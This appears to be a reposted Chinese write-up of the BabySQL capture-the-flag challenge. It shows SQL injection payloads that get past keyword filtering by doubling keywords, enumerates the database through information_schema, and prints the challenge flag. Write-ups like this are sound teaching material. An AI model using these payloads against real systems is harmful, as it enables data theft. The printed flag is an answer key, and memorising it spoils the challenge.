当前位置: 首页 > news >正文

18.[极客大挑战 2019]BabySQL1

进入靶场

随便输输

再输输

可以判断是单引号闭合

再随便输输

查询字段数量

得,过滤了

关键字也过滤了

只能双写了

根据回显,这样可以,只是需要改改

1,2不行

1,2,3行

1,2,3,4不行

可以尝试得到库名,表名了

库名    database()

DATABASE() 是 MySQL 中的一个函数,它返回当前选定(或默认)数据库的名称。

group_concat(table_name) infmation_schema.table_schema=databa' at line 1

过滤了,双写

查库名      group_concat(schema_name) frfromom infoorrmation_schema.schemata

 

查表名  seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema = 'ctf'

1' ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag

flag{e84e4db1-9040-4f81-9416-73a7eac9c6b1}


http://www.mrgr.cn/news/79509.html

相关文章:

  • 【开源大屏】玩转开源积木BI,从0到1设计一个大屏
  • 2024年最新 Docker 安装 Nginx 容器 (完整详细版) 2025年最新
  • react native StatusBar小记
  • OpenSSH和OpenSSL升级
  • 欢迪迈手机商城设计与实现
  • MySQL不能被其他地址访问,授权问题解决(8.x,,5.x)
  • 书后习题答案:《Python程序设计基础(第2版)》,电子工业出版社,2020.01
  • SpringBoot自动配置底层核心源码
  • 电子商务人工智能指南 2/6 - 需求预测和库存管理
  • 【开源】A064—基于JAVA的民族婚纱预定系统的设计与实现
  • FastAPI解决跨域报错net::ERR_FAILED 200 (OK)
  • 木棍的长度
  • (七)腾讯cloudstudio+Stable-Diffusion-webui AI绘画教程-安装Stable-Diffusion-WebUI
  • 结合Spring Security的两种用户登陆认证以及授权方案
  • Linux下mysql环境的搭建
  • React第十三节开发中常见问题之(视图更新、事件处理)
  • Python3 报错 <urlopen error unknown url type: https>
  • 容器镜像仓库
  • 【UE5】制作插件 并调试【vs2022】
  • vue vxe-table 实现财务记账凭证并打印
  • 音视频入门基础:MPEG2-TS专题(13)——FFmpeg源码中,解析Section Header的实现
  • 【git reset】本地下载特定历史提交哈希值的github文件【未联网服务器】进行git reset操作
  • 编码器:提取语义特征,上下文信息;解码器:生成目标语言;每个单词的词经过编码器后的编码就包括上下文信息
  • MODBUS POll使用简介
  • 使用docker安装jenkins
  • 12.08Java